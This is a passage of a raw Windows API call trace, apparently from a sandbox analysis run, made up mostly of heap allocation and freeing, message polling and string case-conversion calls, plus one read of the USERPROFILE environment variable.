hHeap=0x25c0000) returned 1 [0262.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.623] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.623] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.623] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0262.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.624] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.627] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.627] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.627] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.627] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.627] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.627] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.628] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.628] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.628] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.628] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.628] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.631] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.631] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.631] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.631] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.631] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.631] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.631] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0262.631] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.631] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.631] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.631] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.631] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.631] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.631] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0262.632] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.632] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0262.632] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.632] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0262.632] CryptReleaseContext (hProv=0xad2be8, dwFlags=0x0) returned 1 [0262.632] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.632] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0262.632] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.632] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0262.632] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.632] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0262.632] FreeLibrary (hLibModule=0x74d40000) returned 1 [0262.633] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.633] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.633] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.635] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.644] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0262.644] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0262.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0262.644] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0262.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0262.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0262.644] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0262.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0262.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0262.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0262.645] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 